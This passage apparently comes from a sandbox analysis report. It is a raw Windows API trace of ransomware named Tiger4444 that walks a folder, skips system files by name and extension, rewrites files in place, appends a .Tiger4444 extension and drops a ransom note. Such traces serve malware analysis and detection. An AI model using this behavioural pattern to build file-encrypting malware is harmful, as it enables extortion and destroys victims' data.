lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13327646515) returned 1 [0041.823] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=622093) returned 1 [0041.823] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0041.823] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0041.824] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x98110, lpName=0x0) returned 0x2c8 [0041.825] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x98110) returned 0x2eb0000 [0041.932] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.932] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0041.932] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.932] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0041.932] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.932] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0041.932] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.933] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0041.933] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13338565469) returned 1 [0041.933] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0041.933] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0041.933] UnmapViewOfFile (lpBaseAddress=0x2eb0000) returned 1 [0041.939] CloseHandle (hObject=0x2c8) returned 1 [0041.939] CloseHandle (hObject=0x260) returned 1 [0041.950] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\NetworkIssueFAQ.mht.Tiger4444") returned 62 [0041.951] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\NetworkIssueFAQ.mht" (normalized: "c:\\windows10upgrade\\resources\\ux\\networkissuefaq.mht"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\NetworkIssueFAQ.mht.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\networkissuefaq.mht.tiger4444"), dwFlags=0x1) returned 1 [0041.951] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=622096 | out: Addend=0xc6f980) returned 4290112 [0041.951] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=109 | out: Addend=0xc6f98c) returned 2547 [0041.951] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea631830, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea631830, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x875, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NoNetworkConnection.png", cAlternateFileName="NONETW~1.PNG")) returned 1 [0041.951] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0041.952] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.952] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2="Tiger4444.exe") returned -1 [0041.952] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2=".") returned 1 [0041.952] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2="..") returned 1 [0041.952] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2="windows") returned -1 [0041.952] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2="bootmgr") returned 1 [0041.952] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2="pagefile.sys") returned -1 [0041.952] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2="boot") returned 1 [0041.952] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2="ids.txt") returned 1 [0041.952] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2="NTUSER.DAT") returned -1 [0041.952] lstrcpyW (in: lpString1=0x30aeaea, lpString2="NoNetworkConnection.png" | out: lpString1="NoNetworkConnection.png") returned="NoNetworkConnection.png" [0041.952] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnection.png", dwFileAttributes=0x0) returned 1 [0041.952] lstrlenW (lpString="NoNetworkConnection.png") returned 23 [0041.952] lstrlenW (lpString="Tiger4444") returned 9 [0041.952] lstrcmpiW (lpString1="ction.png", lpString2="Tiger4444") returned -1 [0041.952] lstrlenW (lpString=".dll") returned 4 [0041.952] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0041.952] lstrlenW (lpString=".lnk") returned 4 [0041.952] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0041.952] lstrlenW (lpString=".ini") returned 4 [0041.952] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0041.952] lstrlenW (lpString=".sys") returned 4 [0041.952] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0041.952] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnection.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnection.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.953] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.953] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13340571492) returned 1 [0041.953] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=2165) returned 1 [0041.953] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0041.953] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0041.953] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb80, lpName=0x0) returned 0x2c8 [0041.954] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb80) returned 0xbe0000 [0041.955] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.955] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0041.955] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.955] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0041.955] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.956] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0041.956] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.956] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0041.956] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13340891434) returned 1 [0041.956] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0041.956] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0041.956] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.956] CloseHandle (hObject=0x2c8) returned 1 [0041.956] CloseHandle (hObject=0x260) returned 1 [0041.957] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnection.png.Tiger4444") returned 66 [0041.957] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnection.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnection.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnection.png.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnection.png.tiger4444"), dwFlags=0x1) returned 1 [0041.958] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=2176 | out: Addend=0xc6f980) returned 4912208 [0041.958] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=3 | out: Addend=0xc6f98c) returned 2656 [0041.958] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea631830, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea631830, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x8a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NoNetworkConnectionHoverOver.png", cAlternateFileName="NONETW~2.PNG")) returned 1 [0041.958] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0041.958] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.958] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2="Tiger4444.exe") returned -1 [0041.958] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2=".") returned 1 [0041.958] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2="..") returned 1 [0041.958] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2="windows") returned -1 [0041.958] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2="bootmgr") returned 1 [0041.958] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2="pagefile.sys") returned -1 [0041.958] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2="boot") returned 1 [0041.958] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2="ids.txt") returned 1 [0041.958] lstrcmpiW (lpString1="NoNetworkConnectionHoverOver.png", lpString2="NTUSER.DAT") returned -1 [0041.958] lstrcpyW (in: lpString1=0x30aeaea, lpString2="NoNetworkConnectionHoverOver.png" | out: lpString1="NoNetworkConnectionHoverOver.png") returned="NoNetworkConnectionHoverOver.png" [0041.958] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnectionHoverOver.png", dwFileAttributes=0x0) returned 1 [0041.959] lstrlenW (lpString="NoNetworkConnectionHoverOver.png") returned 32 [0041.959] lstrlenW (lpString="Tiger4444") returned 9 [0041.959] lstrcmpiW (lpString1="rOver.png", lpString2="Tiger4444") returned -1 [0041.959] lstrlenW (lpString=".dll") returned 4 [0041.959] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0041.959] lstrlenW (lpString=".lnk") returned 4 [0041.959] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0041.959] lstrlenW (lpString=".ini") returned 4 [0041.959] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0041.959] lstrlenW (lpString=".sys") returned 4 [0041.959] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0041.959] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnectionHoverOver.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnectionhoverover.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.959] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.959] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13341225136) returned 1 [0041.959] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=2212) returned 1 [0041.959] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0041.959] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0041.959] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbb0, lpName=0x0) returned 0x2c8 [0041.960] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbb0) returned 0xbe0000 [0041.961] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.961] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0041.961] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.961] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0041.961] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.961] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0041.961] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.961] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0041.961] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13341456957) returned 1 [0041.962] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0041.962] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0041.962] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.962] CloseHandle (hObject=0x2c8) returned 1 [0041.962] CloseHandle (hObject=0x260) returned 1 [0041.963] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnectionHoverOver.png.Tiger4444") returned 75 [0041.963] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnectionHoverOver.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnectionhoverover.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnectionHoverOver.png.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnectionhoverover.png.tiger4444"), dwFlags=0x1) returned 1 [0041.964] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=2224 | out: Addend=0xc6f980) returned 4914384 [0041.964] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 2659 [0041.964] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea63c947, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea63c947, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pass.png", cAlternateFileName="")) returned 1 [0041.964] lstrcmpiW (lpString1="pass.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0041.964] lstrcmpiW (lpString1="pass.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0041.964] lstrcmpiW (lpString1="pass.png", lpString2="Tiger4444.exe") returned -1 [0041.964] lstrcmpiW (lpString1="pass.png", lpString2=".") returned 1 [0041.964] lstrcmpiW (lpString1="pass.png", lpString2="..") returned 1 [0041.964] lstrcmpiW (lpString1="pass.png", lpString2="windows") returned -1 [0041.964] lstrcmpiW (lpString1="pass.png", lpString2="bootmgr") returned 1 [0041.964] lstrcmpiW (lpString1="pass.png", lpString2="pagefile.sys") returned 1 [0041.964] lstrcmpiW (lpString1="pass.png", lpString2="boot") returned 1 [0041.964] lstrcmpiW (lpString1="pass.png", lpString2="ids.txt") returned 1 [0041.964] lstrcmpiW (lpString1="pass.png", lpString2="NTUSER.DAT") returned 1 [0041.964] lstrcpyW (in: lpString1=0x30aeaea, lpString2="pass.png" | out: lpString1="pass.png") returned="pass.png" [0041.964] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\pass.png", dwFileAttributes=0x0) returned 1 [0041.965] lstrlenW (lpString="pass.png") returned 8 [0041.965] lstrlenW (lpString="Tiger4444") returned 9 [0041.965] lstrcmpiW (lpString1="", lpString2="Tiger4444") returned -1 [0041.965] lstrlenW (lpString=".dll") returned 4 [0041.965] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0041.965] lstrlenW (lpString=".lnk") returned 4 [0041.965] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0041.965] lstrlenW (lpString=".ini") returned 4 [0041.965] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0041.965] lstrlenW (lpString=".sys") returned 4 [0041.965] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0041.965] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\pass.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\pass.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0041.965] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0041.965] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13341835618) returned 1 [0041.965] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=1822) returned 1 [0041.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0041.965] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc717b8 [0041.965] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa20, lpName=0x0) returned 0x2c8 [0041.966] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa20) returned 0xbe0000 [0041.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0041.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0041.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0041.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0041.967] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0041.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0041.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0041.967] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0041.967] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13342059081) returned 1 [0041.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0041.968] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc717b8 | out: hHeap=0xc50000) returned 1 [0041.968] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.968] CloseHandle (hObject=0x2c8) returned 1 [0041.968] CloseHandle (hObject=0x260) returned 1 [0041.969] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\pass.png.Tiger4444") returned 51 [0041.969] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\pass.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\pass.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\pass.png.Tiger4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\pass.png.tiger4444"), dwFlags=0x1) returned 1 [0041.969] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=1824 | out: Addend=0xc6f980) returned 4916608 [0041.969] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 2661 [0041.971] FindNextFileW (in: hFindFile=0xc72d08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea63c947, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea63c947, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pass.png", cAlternateFileName="")) returned 0 [0041.972] FindClose (in: hFindFile=0xc72d08 | out: hFindFile=0xc72d08) returned 1 [0041.972] lstrcpyW (in: lpString1=0x30aeaea, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0041.972] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\windows10upgrade\\resources\\ux\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0041.973] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0041.973] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0041.973] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0041.973] CloseHandle (hObject=0x260) returned 1 [0041.973] CloseHandle (hObject=0x2ac) returned 1 [0041.974] GetCurrentThreadId () returned 0xfa8 [0041.974] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc666a8 [0041.974] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS", iMaxLength=2048 | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS" [0041.974] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc60fe8 | out: hHeap=0xc50000) returned 1 [0041.974] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc666a0 | out: hHeap=0xc50000) returned 1 [0041.974] lstrcatW (in: lpString1="", lpString2="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS" [0041.974] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS", lpString2="\\" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\" [0041.974] lstrcatW (in: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\.BFC0E91B00AE8A0620D3") returned="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\.BFC0E91B00AE8A0620D3" [0041.974] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\windows10upgrade\\resources\\ux\\microsoft.winjs\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0041.976] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0041.979] FlushFileBuffers (hFile=0x2ac) returned 1 [0041.980] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0041.980] CloseHandle (hObject=0x2ac) returned 1 [0041.981] lstrlenW (lpString="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS") returned 48 [0041.981] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0041.981] FindFirstFileW (in: lpFileName="C:\\Windows10Upgrade\\resources\\ux\\Microsoft.WinJS\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea60a72c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea60a72c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7e0a1462, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f08 [0041.981] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.981] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0041.981] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0041.981] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0041.981] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea60a72c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea60a72c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x7e0a1462, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.981] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0041.981] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0041.981] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0041.981] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0041.981] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0041.981] FindNextFileW (in: hFindFile=0xc72f08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, 